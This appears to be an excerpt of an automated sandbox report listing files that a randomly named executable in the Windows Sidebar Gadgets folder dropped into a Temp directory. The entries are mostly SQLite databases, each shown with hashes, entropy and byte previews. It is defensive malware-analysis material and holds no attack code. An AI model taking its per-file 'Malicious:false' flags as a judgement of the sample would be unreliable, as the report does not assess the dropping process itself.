                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\BUgJjFw983

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                  Entropy (8bit):0.037963276276857943
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                  MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                  SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                  SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                  SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\BbX9rYMvpu

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\BeMm9DPJuo

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\BuXqUMbamR

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\CZEozqzEFs

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\CgbsOz5yCy

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\CjQhTGM7Zb

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\D4rZQa27Lm

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\DALhflUzmc

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\DCzHm7idwd

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\DKigLYstlv

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\DUwiEiVzcO

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):25
                                                                                                                                                                  Entropy (8bit):4.5638561897747225
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:9QreHSwbRYSkmX:NJYSvX
                                                                                                                                                                  MD5:C16C1E4ACE90A14EBBF27681ED84B808
                                                                                                                                                                  SHA1:33E4730B5BAA28ABB6F5718A3DD0329267D2EE03
                                                                                                                                                                  SHA-256:B21E61E8A39857C0E50321D1A239D268FF5BEB036B10BC8EF326CC9478FAFF36
                                                                                                                                                                  SHA-512:49173A8D6116AAF6E73BFFF86422AB2DDE85BC92D56E4E7F3B54B4DA2E7A5DC23D22CE57E24D576B4A0DE26AE44B250763CCE4C0BF0EE6191C1E995670C2FDB3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:F871BuNg8aKwU9O4WnVi2GbCr

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\DWuTCbu4oQ

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\DkK8Et4saI

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\E8mO80Ufi3

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\EGF8x1NVCm

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\EVDQGhX1kB

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ElxgBS6Axi

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\EuDPJB6Wcd

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\F1UGWHMQTA

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
